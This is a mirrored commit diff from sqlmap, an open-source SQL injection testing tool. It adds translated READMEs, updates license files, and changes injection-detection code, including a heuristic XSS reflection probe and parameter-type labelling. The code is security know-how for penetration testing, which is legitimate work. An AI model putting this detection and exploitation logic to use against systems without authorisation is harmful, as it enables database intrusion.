mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-30 01:50:01 +03:00
commit
3f22fd7a9b
|
@ -55,5 +55,8 @@ Links
|
|||
Translations
|
||||
----
|
||||
|
||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
|
||||
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
|
||||
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
|
||||
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||
of the GNU General Public License (GPL) is appended to this file.
|
||||
|
||||
sqlmap is (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||
sqlmap is (C) 2006-2014 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||
|
||||
This program is free software; you may redistribute and/or modify it under
|
||||
the terms of the GNU General Public License as published by the Free
|
||||
|
|
487
doc/THANKS.md
487
doc/THANKS.md
File diff suppressed because it is too large
Load Diff
|
@ -20,6 +20,8 @@ This file lists bundled packages and their associated licensing terms.
|
|||
* The Oset library located under thirdparty/oset/.
|
||||
Copyright (C) 2010, BlueDynamics Alliance, Austria.
|
||||
Copyright (C) 2009, Raymond Hettinger, and others.
|
||||
* The PrettyPrint library located under thirdparty/prettyprint/.
|
||||
Copyright (C) 2010, Chris Hall.
|
||||
* The SocksiPy library located under thirdparty/socks/.
|
||||
Copyright (C) 2006, Dan-Haim.
|
||||
|
||||
|
@ -55,7 +57,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
|||
Copyright (C) 2008-2009, Jose Fonseca.
|
||||
* The KeepAlive library located under thirdparty/keepalive/.
|
||||
Copyright (C) 2002-2003, Michael D. Stenner.
|
||||
* The MultipartPost library located under thirdparty/multipartpost/.
|
||||
* The MultipartPost library located under thirdparty/multipart/.
|
||||
Copyright (C) 2006, Will Holcomb.
|
||||
* The XDot library located under thirdparty/xdot/.
|
||||
Copyright (C) 2008, Jose Fonseca.
|
||||
|
@ -281,8 +283,6 @@ be bound by the terms and conditions of this License Agreement.
|
|||
Copyright (C) 2012, Marcel Hellkamp.
|
||||
* The PageRank library located under thirdparty/pagerank/.
|
||||
Copyright (C) 2010, Corey Goldberg.
|
||||
* The PrettyPrint library located under thirdparty/prettyprint/.
|
||||
Copyright (C) 2010, Chris Hall.
|
||||
* The Termcolor library located under thirdparty/termcolor/.
|
||||
Copyright (C) 2008-2011, Volvox Development Team.
|
||||
|
||||
|
|
53
doc/translations/README-gr-GR.md
Normal file
53
doc/translations/README-gr-GR.md
Normal file
|
@ -0,0 +1,53 @@
|
|||
sqlmap
|
||||
==
|
||||
|
||||
|
||||
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
||||
|
||||
Εικόνες
|
||||
----
|
||||
|
||||

|
||||
|
||||
Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
|
||||
|
||||
Εγκατάσταση
|
||||
----
|
||||
|
||||
Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
|
||||
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
|
||||
|
||||
Χρήση
|
||||
----
|
||||
|
||||
Για να δείτε μια βασική λίστα από επιλογές πατήστε:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
|
||||
Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Σύνδεσμοι
|
||||
----
|
||||
|
||||
* Αρχική σελίδα: http://sqlmap.org
|
||||
* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||
* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
53
doc/translations/README-hr-HR.md
Normal file
53
doc/translations/README-hr-HR.md
Normal file
|
@ -0,0 +1,53 @@
|
|||
sqlmap
|
||||
==
|
||||
|
||||
|
||||
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
||||
|
||||
Slike zaslona
|
||||
----
|
||||
|
||||

|
||||
|
||||
Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
|
||||
|
||||
Instalacija
|
||||
----
|
||||
|
||||
Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
|
||||
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
|
||||
|
||||
Korištenje
|
||||
----
|
||||
|
||||
Kako biste dobili listu osnovnih opcija i prekidača koristite:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Kako biste dobili listu svih opcija i prekidača koristite:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
|
||||
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||
|
||||
Poveznice
|
||||
----
|
||||
|
||||
* Početna stranica: http://sqlmap.org
|
||||
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||
* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||
* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
52
doc/translations/README-zh-CN.md
Normal file
52
doc/translations/README-zh-CN.md
Normal file
|
@ -0,0 +1,52 @@
|
|||
sqlmap
|
||||
==
|
||||
|
||||
|
||||
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
|
||||
|
||||
演示截图
|
||||
----
|
||||
|
||||

|
||||
|
||||
你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
|
||||
|
||||
安装方法
|
||||
----
|
||||
|
||||
你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
|
||||
|
||||
推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
|
||||
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上
|
||||
|
||||
使用方法
|
||||
----
|
||||
|
||||
通过如下命令可以查看基本的用法及命令行参数:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
通过如下的命令可以查看所有的用法及命令行参数:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
|
||||
|
||||
链接
|
||||
----
|
||||
|
||||
* 项目主页: http://sqlmap.org
|
||||
* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||
* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||
* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
@ -58,6 +58,7 @@ from lib.core.exception import SqlmapConnectionException
|
|||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
|
||||
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
||||
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
|
||||
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
|
||||
|
@ -84,7 +85,13 @@ def checkSqlInjection(place, parameter, value):
|
|||
# Set the flag for SQL injection test mode
|
||||
kb.testMode = True
|
||||
|
||||
for test in getSortedInjectionTests():
|
||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||
|
||||
tests = getSortedInjectionTests()
|
||||
|
||||
while tests:
|
||||
test = tests.pop(0)
|
||||
|
||||
try:
|
||||
if kb.endDetection:
|
||||
break
|
||||
|
@ -398,7 +405,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
|
||||
# Perform the test's False request
|
||||
if not falseResult:
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
|
@ -409,7 +416,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
|
||||
if candidates:
|
||||
conf.string = candidates[0]
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'"))
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
|
@ -432,7 +439,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
result = output == "1"
|
||||
|
||||
if result:
|
||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
|
||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
|
@ -454,7 +461,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
|
||||
|
||||
if trueResult:
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
|
||||
infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
|
@ -490,7 +497,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
||||
|
||||
if isinstance(reqPayload, basestring):
|
||||
infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title)
|
||||
infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
|
||||
logger.info(infoMsg)
|
||||
|
||||
injectable = True
|
||||
|
@ -596,6 +603,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
|
||||
conf.verbose = int(choice)
|
||||
setVerbosity()
|
||||
tests.insert(0, test)
|
||||
elif choice[0] in ("n", "N"):
|
||||
return None
|
||||
elif choice[0] in ("e", "E"):
|
||||
|
@ -781,6 +789,8 @@ def heuristicCheckSqlInjection(place, parameter):
|
|||
|
||||
origValue = conf.paramDict[place][parameter]
|
||||
|
||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||
|
||||
prefix = ""
|
||||
suffix = ""
|
||||
|
||||
|
@ -806,8 +816,8 @@ def heuristicCheckSqlInjection(place, parameter):
|
|||
parseFilePaths(page)
|
||||
result = wasLastResponseDBMSError()
|
||||
|
||||
infoMsg = "heuristic (basic) test shows that %s " % place
|
||||
infoMsg += "parameter '%s' might " % parameter
|
||||
infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
|
||||
infoMsg += "'%s' might " % parameter
|
||||
|
||||
def _(page):
|
||||
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
|
||||
|
@ -848,6 +858,23 @@ def heuristicCheckSqlInjection(place, parameter):
|
|||
infoMsg += "not be injectable"
|
||||
logger.warn(infoMsg)
|
||||
|
||||
kb.heuristicMode = True
|
||||
|
||||
value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr())
|
||||
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
|
||||
payload = agent.payload(place, parameter, newValue=payload)
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
|
||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||
|
||||
if value in (page or ""):
|
||||
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
|
||||
infoMsg += "'%s' might " % parameter
|
||||
infoMsg += "be vulnerable to XSS attacks"
|
||||
logger.info(infoMsg)
|
||||
|
||||
kb.heuristicMode = False
|
||||
|
||||
return kb.heuristicTest
|
||||
|
||||
def checkDynParam(place, parameter, value):
|
||||
|
@ -864,7 +891,9 @@ def checkDynParam(place, parameter, value):
|
|||
dynResult = None
|
||||
randInt = randomInt()
|
||||
|
||||
infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
|
||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||
|
||||
infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
try:
|
||||
|
@ -872,7 +901,7 @@ def checkDynParam(place, parameter, value):
|
|||
dynResult = Request.queryPage(payload, place, raise404=False)
|
||||
|
||||
if not dynResult:
|
||||
infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
|
||||
infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
randInt = randomInt()
|
||||
|
|
|
@ -126,8 +126,8 @@ def _selectInjection():
|
|||
kb.injection = kb.injections[index]
|
||||
|
||||
def _formatInjection(inj):
|
||||
data = "Place: %s\n" % inj.place
|
||||
data += "Parameter: %s\n" % inj.parameter
|
||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
|
||||
data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)
|
||||
|
||||
for stype, sdata in inj.data.items():
|
||||
title = sdata.title
|
||||
|
@ -146,7 +146,7 @@ def _formatInjection(inj):
|
|||
vector = "%s%s" % (vector, comment)
|
||||
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
||||
data += " Title: %s\n" % title
|
||||
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus))
|
||||
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
|
||||
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
||||
|
||||
return data
|
||||
|
@ -251,7 +251,7 @@ def start():
|
|||
return True
|
||||
|
||||
if conf.url and not any((conf.forms, conf.crawlDepth)):
|
||||
kb.targets.add((conf.url, conf.method, conf.data, conf.cookie))
|
||||
kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
|
||||
|
||||
if conf.configFile and not kb.targets:
|
||||
errMsg = "you did not edit the configuration file properly, set "
|
||||
|
@ -264,13 +264,16 @@ def start():
|
|||
logger.info(infoMsg)
|
||||
|
||||
hostCount = 0
|
||||
initialHeaders = list(conf.httpHeaders)
|
||||
|
||||
for targetUrl, targetMethod, targetData, targetCookie in kb.targets:
|
||||
for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
|
||||
try:
|
||||
conf.url = targetUrl
|
||||
conf.method = targetMethod
|
||||
conf.method = targetMethod.upper() if targetMethod else targetMethod
|
||||
conf.data = targetData
|
||||
conf.cookie = targetCookie
|
||||
conf.httpHeaders = list(initialHeaders)
|
||||
conf.httpHeaders.extend(targetHeaders or [])
|
||||
|
||||
initTargetEnv()
|
||||
parseTargetUrl()
|
||||
|
@ -308,13 +311,13 @@ def start():
|
|||
if conf.forms:
|
||||
message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
|
||||
else:
|
||||
message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
||||
message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
||||
|
||||
if conf.cookie:
|
||||
message += "\nCookie: %s" % conf.cookie
|
||||
|
||||
if conf.data is not None:
|
||||
message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else ""
|
||||
message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
|
||||
|
||||
if conf.forms:
|
||||
if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
|
||||
|
@ -324,13 +327,13 @@ def start():
|
|||
test = readInput(message, default="Y")
|
||||
|
||||
if not test or test[0] in ("y", "Y"):
|
||||
if conf.method == HTTPMETHOD.POST:
|
||||
message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
||||
if conf.method != HTTPMETHOD.GET:
|
||||
message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
||||
conf.data = readInput(message, default=conf.data)
|
||||
conf.data = _randomFillBlankFields(conf.data)
|
||||
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
||||
|
||||
elif conf.method == HTTPMETHOD.GET:
|
||||
else:
|
||||
if targetUrl.find("?") > -1:
|
||||
firstPart = targetUrl[:targetUrl.find("?")]
|
||||
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
||||
|
@ -425,6 +428,8 @@ def start():
|
|||
|
||||
paramDict = conf.paramDict[place]
|
||||
|
||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||
|
||||
for parameter, value in paramDict.items():
|
||||
if not proceed:
|
||||
break
|
||||
|
@ -436,7 +441,7 @@ def start():
|
|||
if paramKey in kb.testedParams:
|
||||
testSqlInj = False
|
||||
|
||||
infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter)
|
||||
infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
elif parameter in conf.testParameter:
|
||||
|
@ -445,31 +450,37 @@ def start():
|
|||
elif parameter == conf.rParam:
|
||||
testSqlInj = False
|
||||
|
||||
infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter)
|
||||
infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
elif parameter in conf.skip:
|
||||
testSqlInj = False
|
||||
|
||||
infoMsg = "skipping %s parameter '%s'" % (place, parameter)
|
||||
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
elif parameter == conf.csrfToken:
|
||||
testSqlInj = False
|
||||
|
||||
infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
|
||||
logger.info(infoMsg)
|
||||
|
||||
# Ignore session-like parameters for --level < 4
|
||||
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
||||
testSqlInj = False
|
||||
|
||||
infoMsg = "ignoring %s parameter '%s'" % (place, parameter)
|
||||
infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
||||
check = checkDynParam(place, parameter, value)
|
||||
|
||||
if not check:
|
||||
warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter)
|
||||
warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
else:
|
||||
infoMsg = "%s parameter '%s' is dynamic" % (place, parameter)
|
||||
infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
kb.testedParams.add(paramKey)
|
||||
|
@ -479,11 +490,11 @@ def start():
|
|||
|
||||
if check != HEURISTIC_TEST.POSITIVE:
|
||||
if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
|
||||
infoMsg = "skipping %s parameter '%s'" % (place, parameter)
|
||||
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
continue
|
||||
|
||||
infoMsg = "testing for SQL injection on %s " % place
|
||||
infoMsg = "testing for SQL injection on %s " % paramType
|
||||
infoMsg += "parameter '%s'" % parameter
|
||||
logger.info(infoMsg)
|
||||
|
||||
|
@ -506,7 +517,7 @@ def start():
|
|||
paramKey = (conf.hostname, conf.path, None, None)
|
||||
kb.testedParams.add(paramKey)
|
||||
else:
|
||||
warnMsg = "%s parameter '%s' is not " % (place, parameter)
|
||||
warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
|
||||
warnMsg += "injectable"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
|
|
|
@ -10,6 +10,7 @@ import re
|
|||
from lib.core.common import Backend
|
||||
from lib.core.common import extractRegexResult
|
||||
from lib.core.common import getSQLSnippet
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import isDBMSVersionAtLeast
|
||||
from lib.core.common import isNumber
|
||||
from lib.core.common import isTechniqueAvailable
|
||||
|
@ -32,6 +33,8 @@ from lib.core.enums import PLACE
|
|||
from lib.core.enums import POST_HINT
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import GENERIC_SQL_COMMENT
|
||||
from lib.core.settings import PAYLOAD_DELIMITER
|
||||
from lib.core.settings import REPLACEMENT_MARKER
|
||||
|
@ -85,7 +88,7 @@ class Agent(object):
|
|||
|
||||
paramString = conf.parameters[place]
|
||||
paramDict = conf.paramDict[place]
|
||||
origValue = paramDict[parameter]
|
||||
origValue = getUnicode(paramDict[parameter])
|
||||
|
||||
if place == PLACE.URI:
|
||||
paramString = origValue
|
||||
|
@ -99,10 +102,8 @@ class Agent(object):
|
|||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||
origValue = origValue.split('>')[-1]
|
||||
elif kb.postHint == POST_HINT.JSON:
|
||||
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)(?P<result>[^"]+\Z)', origValue)
|
||||
elif kb.postHint == POST_HINT.JSON_LIKE:
|
||||
origValue = extractRegexResult(r'(?s)\'\s*:\s*(?P<result>\d+\Z)', origValue) or extractRegexResult(r"(?s)(?P<result>[^']+\Z)", origValue)
|
||||
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
||||
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
|
||||
else:
|
||||
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
||||
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
||||
|
@ -110,6 +111,9 @@ class Agent(object):
|
|||
paramString = origValue
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
origValue = origValue[origValue.index(',') + 1:]
|
||||
